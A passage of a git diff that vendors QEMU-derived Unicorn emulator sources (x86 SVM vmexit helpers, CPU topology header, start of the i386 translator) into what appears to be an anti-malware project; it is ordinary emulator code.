stq_phys(cs->as, addr + offsetof(struct vmcb, save.star), env->star); + stq_phys(cs->as, + addr + offsetof(struct vmcb, save.sysenter_cs), env->sysenter_cs); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sysenter_esp), + env->sysenter_esp); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sysenter_eip), + env->sysenter_eip); +} + +void helper_stgi(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_STGI, 0); + env->hflags2 |= HF2_GIF_MASK; +} + +void helper_clgi(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_CLGI, 0); + env->hflags2 &= ~HF2_GIF_MASK; +} + +void helper_skinit(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_SKINIT, 0); + /* XXX: not implemented */ + raise_exception(env, EXCP06_ILLOP); +} + +void helper_invlpga(CPUX86State *env, int aflag) +{ + X86CPU *cpu = x86_env_get_cpu(env); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPGA, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + /* XXX: could use the ASID to see if it is needed to do the + flush */ + tlb_flush_page(CPU(cpu), addr); +} + +void helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (likely(!(env->hflags & HF_SVMI_MASK))) { + return; + } + if ( (int32_t)type >= SVM_EXIT_READ_CR0 && type <= SVM_EXIT_READ_CR0 + 8 ) { + if (env->intercept_cr_read & (1 << (type - SVM_EXIT_READ_CR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_WRITE_CR0 && type <= SVM_EXIT_WRITE_CR0 + 8 ) { + if (env->intercept_cr_write & (1 << (type - SVM_EXIT_WRITE_CR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_READ_DR0 && type <= SVM_EXIT_READ_DR0 + 7 ) { + if (env->intercept_dr_read & (1 << (type - SVM_EXIT_READ_DR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_WRITE_DR0 && type <= SVM_EXIT_WRITE_DR0 + 7 ) { + if (env->intercept_dr_write & (1 << (type - SVM_EXIT_WRITE_DR0))) { + helper_vmexit(env, type, param); + } + } else if ( type >= SVM_EXIT_EXCP_BASE && type <= SVM_EXIT_EXCP_BASE + 31 ) { + if (env->intercept_exceptions & (1 << (type - SVM_EXIT_EXCP_BASE))) { + helper_vmexit(env, type, param); + } + } else if ( type == SVM_EXIT_MSR ) { + if (env->intercept & (1ULL << (SVM_EXIT_MSR - SVM_EXIT_INTR))) { + /* FIXME: this should be read in at vmrun (faster this way?) */ + uint64_t addr = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.msrpm_base_pa)); + uint32_t t0, t1; + + uint32_t ecx = (uint32_t)env->regs[R_ECX]; + if ( (int32_t)ecx >= 0 && ecx <= 0x1fff ) { + t0 = (env->regs[R_ECX] * 2) % 8; + t1 = (env->regs[R_ECX] * 2) / 8; + } else if ( ecx >= 0xc0000000 && ecx <= 0xc0001fff ) { + t0 = (8192 + env->regs[R_ECX] - 0xc0000000) * 2; + t1 = (t0 / 8); + t0 %= 8; + } else if ( ecx >= 0xc0010000 && ecx <= 0xc0011fff ) { + t0 = (16384 + env->regs[R_ECX] - 0xc0010000) * 2; + t1 = (t0 / 8); + t0 %= 8; + } else { + helper_vmexit(env, type, param); + t0 = 0; + t1 = 0; + } + if (ldub_phys(cs->as, addr + t1) & ((1 << param) << t0)) { + helper_vmexit(env, type, param); + } + } + } else { + if (env->intercept & (1ULL << (type - SVM_EXIT_INTR))) { + helper_vmexit(env, type, param); + } + } +} + +void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ + helper_svm_check_intercept_param(env, type, param); +} + +void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, + uint32_t next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (env->intercept & (1ULL << (SVM_EXIT_IOIO - SVM_EXIT_INTR))) { + /* FIXME: this should be read in at vmrun (faster this way?) */ + uint64_t addr = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.iopm_base_pa)); + uint16_t mask = (1 << ((param >> 4) & 7)) - 1; + + if (lduw_phys(cs->as, addr + port / 8) & (mask << (port & 7))) { + /* next env->eip */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), + env->eip + next_eip_addend); + helper_vmexit(env, SVM_EXIT_IOIO, param | (port << 16)); + } + } +} + +/* Note: currently only 32 bits of exit_code are used */ +void helper_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + uint32_t int_ctl; + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmexit(%08x, %016" PRIx64 ", %016" + PRIx64 ", " TARGET_FMT_lx ")!\n", + exit_code, exit_info_1, + ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.exit_info_2)), + env->eip); + + if (env->hflags & HF_INHIBIT_IRQ_MASK) { + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_state), + SVM_INTERRUPT_SHADOW_MASK); + env->hflags &= ~HF_INHIBIT_IRQ_MASK; + } else { + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_state), 0); + } + + /* Save the VM state in the vmcb */ + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.es), + &env->segs[R_ES]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), + &env->segs[R_CS]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), + &env->segs[R_SS]); + svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), + &env->segs[R_DS]); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base), + env->gdt.base); + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit), + env->gdt.limit); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base), + env->idt.base); + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit), + env->idt.limit); + + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.efer), env->efer); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr0), env->cr[0]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr2), env->cr[2]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr3), env->cr[3]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr4), env->cr[4]); + + int_ctl = ldl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); + int_ctl &= ~(V_TPR_MASK | V_IRQ_MASK); + int_ctl |= env->v_tpr & V_TPR_MASK; + if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { + int_ctl |= V_IRQ_MASK; + } + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl), int_ctl); + + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.rflags), + cpu_compute_eflags(env)); + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.rip), + env->eip); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr7), env->dr[7]); + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr6), env->dr[6]); + stb_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, save.cpl), + env->hflags & HF_CPL_MASK); + + /* Reload the host state from vm_hsave */ + env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); + env->hflags &= ~HF_SVMI_MASK; + env->intercept = 0; + env->intercept_exceptions = 0; + cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; + env->tsc_offset = 0; + + env->gdt.base = ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.gdtr.base)); + env->gdt.limit = ldl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.gdtr.limit)); + + env->idt.base = ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.idtr.base)); + env->idt.limit = ldl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.idtr.limit)); + + cpu_x86_update_cr0(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.cr0)) | + CR0_PE_MASK); + cpu_x86_update_cr4(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.cr4))); + cpu_x86_update_cr3(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.cr3))); + /* we need to set the efer after the crs so the hidden flags get + set properly */ + cpu_load_efer(env, ldq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, + save.efer))); + env->eflags = 0; + cpu_load_eflags(env, ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, + save.rflags)), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK | + VM_MASK)); + + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.es), + R_ES); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.cs), + R_CS); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ss), + R_SS); + svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ds), + R_DS); + + env->eip = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rip)); + env->regs[R_ESP] = ldq_phys(cs->as, env->vm_hsave + + offsetof(struct vmcb, save.rsp)); + env->regs[R_EAX] = ldq_phys(cs->as, env->vm_hsave + + offsetof(struct vmcb, save.rax)); + + env->dr[6] = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr6)); + env->dr[7] = ldq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr7)); + + /* other setups */ + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, control.exit_code), + exit_code); + stq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_1), + exit_info_1); + + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info), + ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj))); + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info_err), + ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj_err))); + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), 0); + + env->hflags2 &= ~HF2_GIF_MASK; + /* FIXME: Resets the current ASID register to zero (host ASID). */ + + /* Clears the V_IRQ and V_INTR_MASKING bits inside the processor. */ + + /* Clears the TSC_OFFSET inside the processor. */ + + /* If the host is in PAE mode, the processor reloads the host's PDPEs + from the page table indicated the host's CR3. If the PDPEs contain + illegal state, the processor causes a shutdown. */ + + /* Disables all breakpoints in the host DR7 register. */ + + /* Checks the reloaded host state for consistency. */ + + /* If the host's rIP reloaded by #VMEXIT is outside the limit of the + host's code segment or non-canonical (in the case of long mode), a + #GP fault is delivered inside the host. */ + + /* remove any pending exception */ + cs->exception_index = -1; + env->error_code = 0; + env->old_exception = -1; + + cpu_loop_exit(cs); +} + +void cpu_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ + helper_vmexit(env, exit_code, exit_info_1); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h new file mode 100644 index 0000000..e18ddfb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/topology.h @@ -0,0 +1,134 @@ +/* + * x86 CPU topology data structures and functions + * + * Copyright (c) 2012 Red Hat Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TARGET_I386_TOPOLOGY_H +#define TARGET_I386_TOPOLOGY_H + +/* This file implements the APIC-ID-based CPU topology enumeration logic, + * documented at the following document: + * Intel® 64 Architecture Processor Topology Enumeration + * http://software.intel.com/en-us/articles/intel-64-architecture-processor-topology-enumeration/ + * + * This code should be compatible with AMD's "Extended Method" described at: + * AMD CPUID Specification (Publication #25481) + * Section 3: Multiple Core Calcuation + * as long as: + * nr_threads is set to 1; + * OFFSET_IDX is assumed to be 0; + * CPUID Fn8000_0008_ECX[ApicIdCoreIdSize[3:0]] is set to apicid_core_width(). + */ + +#include "unicorn/platform.h" +#include + +#include "qemu/bitops.h" + +/* APIC IDs can be 32-bit, but beware: APIC IDs > 255 require x2APIC support + */ +typedef uint32_t apic_id_t; + +/* Return the bit width needed for 'count' IDs + */ +static unsigned apicid_bitwidth_for_count(unsigned count) +{ + g_assert(count >= 1); + count -= 1; + return count ? 32 - clz32(count) : 0; +} + +/* Bit width of the SMT_ID (thread ID) field on the APIC ID + */ +static inline unsigned apicid_smt_width(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_bitwidth_for_count(nr_threads); +} + +/* Bit width of the Core_ID field + */ +static inline unsigned apicid_core_width(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_bitwidth_for_count(nr_cores); +} + +/* Bit offset of the Core_ID field + */ +static inline unsigned apicid_core_offset(unsigned nr_cores, + unsigned nr_threads) +{ + return apicid_smt_width(nr_cores, nr_threads); +} + +/* Bit offset of the Pkg_ID (socket ID) field + */ +static inline unsigned apicid_pkg_offset(unsigned nr_cores, unsigned nr_threads) +{ + return apicid_core_offset(nr_cores, nr_threads) + + apicid_core_width(nr_cores, nr_threads); +} + +/* Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID + * + * The caller must make sure core_id < nr_cores and smt_id < nr_threads. + */ +static inline apic_id_t apicid_from_topo_ids(unsigned nr_cores, + unsigned nr_threads, + unsigned pkg_id, + unsigned core_id, + unsigned smt_id) +{ + return (pkg_id << apicid_pkg_offset(nr_cores, nr_threads)) | + (core_id << apicid_core_offset(nr_cores, nr_threads)) | + smt_id; +} + +/* Calculate thread/core/package IDs for a specific topology, + * based on (contiguous) CPU index + */ +static inline void x86_topo_ids_from_idx(unsigned nr_cores, + unsigned nr_threads, + unsigned cpu_index, + unsigned *pkg_id, + unsigned *core_id, + unsigned *smt_id) +{ + unsigned core_index = cpu_index / nr_threads; + *smt_id = cpu_index % nr_threads; + *core_id = core_index % nr_cores; + *pkg_id = core_index / nr_cores; +} + +/* Make APIC ID for the CPU 'cpu_index' + * + * 'cpu_index' is a sequential, contiguous ID for the CPU. + */ +static inline apic_id_t x86_apicid_from_cpu_idx(unsigned nr_cores, + unsigned nr_threads, + unsigned cpu_index) +{ + unsigned pkg_id, core_id, smt_id; + x86_topo_ids_from_idx(nr_cores, nr_threads, cpu_index, + &pkg_id, &core_id, &smt_id); + return apicid_from_topo_ids(nr_cores, nr_threads, pkg_id, core_id, smt_id); +} + +#endif /* TARGET_I386_TOPOLOGY_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c new file mode 100644 index 0000000..cdfd714 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/translate.c @@ -0,0 +1,8812 @@ +/* + * i386 translation + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include +#include +#include +#include "unicorn/platform.h" +#include + +#include "qemu/host-utils.h" +#include "cpu.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "uc_priv.h" + +#define PREFIX_REPZ 0x01 +#define PREFIX_REPNZ 0x02 +#define PREFIX_LOCK 0x04 +#define PREFIX_DATA 0x08 +#define PREFIX_ADR 0x10 +#define PREFIX_VEX 0x20 + +#ifdef TARGET_X86_64 +#define CODE64(s) ((s)->code64) +#define REX_X(s) ((s)->rex_x) +#define REX_B(s) ((s)->rex_b) +#else +#define CODE64(s) 0 +#define REX_X(s) 0 +#define REX_B(s) 0 +#endif + +#ifdef TARGET_X86_64 +# define ctztl ctz64 +# define clztl clz64 +#else +# define ctztl ctz32 +# define clztl clz32 +#endif + +#include "exec/gen-icount.h" + +typedef struct DisasContext { + /* current insn context */ + int override; /* -1 if no override */ + int prefix; + TCGMemOp aflag; + TCGMemOp dflag; + target_ulong pc; /* pc = eip + cs_base */ + int is_jmp; /* 1 = means jump (stop translation), 2 means CPU + static state change (stop translation) */ + /* current block context */ + target_ulong cs_base; /* base of CS segment */ + int pe; /* protected mode */ + int code32; /* 32 bit code segment */ +#ifdef TARGET_X86_64 + int lma; /* long mode active */ + int code64; /* 64 bit code segment */ + int rex_x, rex_b; +#endif + int vex_l; /* vex vector length */ + int vex_v; /* vex vvvv register, without 1's compliment. */ + int ss32; /* 32 bit stack segment */ + CCOp cc_op; /* current CC operation */ + CCOp last_cc_op; /* Unicorn: last CC operation. Save this to see if cc_op has changed */ + bool cc_op_dirty; + int addseg; /* non zero if either DS/ES/SS have a non zero base */ + int f_st; /* currently unused */ + int vm86; /* vm86 mode */ + int cpl; + int iopl; + int tf; /* TF cpu flag */ + int singlestep_enabled; /* "hardware" single step enabled */ + int jmp_opt; /* use direct block chaining for direct jumps */ + int mem_index; /* select memory access functions */ + uint64_t flags; /* all execution flags */ + struct TranslationBlock *tb; + int popl_esp_hack; /* for correct popl with esp base handling */ + int rip_offset; /* only used in x86_64, but left for simplicity */ + int cpuid_features; + int cpuid_ext_features; + int cpuid_ext2_features; + int cpuid_ext3_features; + int cpuid_7_0_ebx_features; + struct uc_struct *uc; + + // Unicorn + target_ulong prev_pc; /* save address of the previous instruction */ +} DisasContext; + +static void gen_eob(DisasContext *s); +static void gen_jmp(DisasContext *s, target_ulong eip); +static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num); +static void gen_op(DisasContext *s, int op, TCGMemOp ot, int d); + +/* i386 arith/logic operations */ +enum { + OP_ADDL, + OP_ORL, + OP_ADCL, + OP_SBBL, + OP_ANDL, + OP_SUBL, + OP_XORL, + OP_CMPL, +}; + +/* i386 shift ops */ +enum { + OP_ROL, + OP_ROR, + OP_RCL, + OP_RCR, + OP_SHL, + OP_SHR, + OP_SHL1, /* undocumented */ + OP_SAR = 7, +}; + +enum { + JCC_O, + JCC_B, + JCC_Z, + JCC_BE, + JCC_S, + JCC_P, + JCC_L, + JCC_LE, +}; + +enum { + /* I386 int registers */ + OR_EAX, /* MUST be even numbered */ + OR_ECX, + OR_EDX, + OR_EBX, + OR_ESP, + OR_EBP, + OR_ESI, + OR_EDI, + + OR_TMP0 = 16, /* temporary operand register */ + OR_TMP1, + OR_A0, /* temporary register used when doing address evaluation */ +}; + +enum { + USES_CC_DST = 1, + USES_CC_SRC = 2, + USES_CC_SRC2 = 4, + USES_CC_SRCT = 8, +}; + +/* Bit set if the global variable is live after setting CC_OP to X. */ +static const uint8_t cc_op_live[CC_OP_NB] = { +#ifdef _MSC_VER + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + USES_CC_SRC, // CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ + + USES_CC_DST | USES_CC_SRC, // CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ + USES_CC_DST | USES_CC_SRC, // CC_OP_MULW, + USES_CC_DST | USES_CC_SRC, // CC_OP_MULL, + USES_CC_DST | USES_CC_SRC, // CC_OP_MULQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDW, + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDL, + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBQ, + + USES_CC_DST, // CC_OP_LOGICB, /* modify all flags, CC_DST = res */ + USES_CC_DST, // CC_OP_LOGICW, + USES_CC_DST, // CC_OP_LOGICL, + USES_CC_DST, // CC_OP_LOGICQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_INCW, + USES_CC_DST | USES_CC_SRC, // CC_OP_INCL, + USES_CC_DST | USES_CC_SRC, // CC_OP_INCQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_DECW, + USES_CC_DST | USES_CC_SRC, // CC_OP_DECL, + USES_CC_DST | USES_CC_SRC, // CC_OP_DECQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLW, + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLL, + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_SARW, + USES_CC_DST | USES_CC_SRC, // CC_OP_SARL, + USES_CC_DST | USES_CC_SRC, // CC_OP_SARQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGW, + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGL, + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ + USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ + + 0, // CC_OP_CLR, /* Z set, all other flags clear. */ +#else + [CC_OP_DYNAMIC] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_EFLAGS] = USES_CC_SRC, + [CC_OP_MULB ... CC_OP_MULQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADDB ... CC_OP_ADDQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADCB ... CC_OP_ADCQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_SUBB ... CC_OP_SUBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, + [CC_OP_SBBB ... CC_OP_SBBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_LOGICB ... CC_OP_LOGICQ] = USES_CC_DST, + [CC_OP_INCB ... CC_OP_INCQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_DECB ... CC_OP_DECQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_SHLB ... CC_OP_SHLQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_SARB ... CC_OP_SARQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_BMILGB ... CC_OP_BMILGQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADCX] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADOX] = USES_CC_SRC | USES_CC_SRC2, + [CC_OP_ADCOX] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_CLR] = 0, +#endif +}; + +static inline void gen_jmp_im(DisasContext *s, target_ulong pc); + +static void set_cc_op(DisasContext *s, CCOp op) +{ + int dead; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + + if (s->cc_op == op) { + return; + } + + /* Discard CC computation that will no longer be used. */ + dead = cc_op_live[s->cc_op] & ~cc_op_live[op]; + if (dead & USES_CC_DST) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_dst); + } + if (dead & USES_CC_SRC) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_src); + } + if (dead & USES_CC_SRC2) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_src2); + } + if (dead & USES_CC_SRCT) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_srcT); + } + + if (op == CC_OP_DYNAMIC) { + /* The DYNAMIC setting is translator only, and should never be + stored. Thus we always consider it clean. */ + s->cc_op_dirty = false; + } else { + /* Discard any computed CC_OP value (see shifts). */ + if (s->cc_op == CC_OP_DYNAMIC) { + tcg_gen_discard_i32(tcg_ctx, cpu_cc_op); + } + s->cc_op_dirty = true; + } + s->cc_op = op; +} + +static void gen_update_cc_op(DisasContext *s) +{ + if (s->cc_op_dirty) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + + tcg_gen_movi_i32(tcg_ctx, cpu_cc_op, s->cc_op); + s->cc_op_dirty = false; + } +} + +static void fpu_update_ip(CPUX86State *env, target_ulong pc) +{ + env->fpip = pc; +} + +#ifdef TARGET_X86_64 + +#define NB_OP_SIZES 4 + +#else /* !TARGET_X86_64 */ + +#define NB_OP_SIZES 3 + +#endif /* !TARGET_X86_64 */ + +#if defined(HOST_WORDS_BIGENDIAN) +#define REG_B_OFFSET (sizeof(target_ulong) - 1) +#define REG_H_OFFSET (sizeof(target_ulong) - 2) +#define REG_W_OFFSET (sizeof(target_ulong) - 2) +#define REG_L_OFFSET (sizeof(target_ulong) - 4) +#define REG_LH_OFFSET (sizeof(target_ulong) - 8) +#else +#define REG_B_OFFSET 0 +#define REG_H_OFFSET 1 +#define REG_W_OFFSET 0 +#define REG_L_OFFSET 0 +#define REG_LH_OFFSET 4 +#endif + +/* In instruction encodings for byte register accesses the + * register number usually indicates "low 8 bits of register N"; + * however there are some special cases where N 4..7 indicates + * [AH, CH, DH, BH], ie "bits 15..8 of register N-4". Return + * true for this special case, false otherwise. + */ +static inline bool byte_reg_is_xH(int x86_64_hregs, int reg) +{ + if (reg < 4) { + return false; + } +#ifdef TARGET_X86_64 + if (reg >= 8 || x86_64_hregs) { + return false; + } +#endif + return true; +} + +/* Select the size of a push/pop operation. */ +static inline TCGMemOp mo_pushpop(DisasContext *s, TCGMemOp ot) +{ + if (CODE64(s)) { + return ot == MO_16 ? 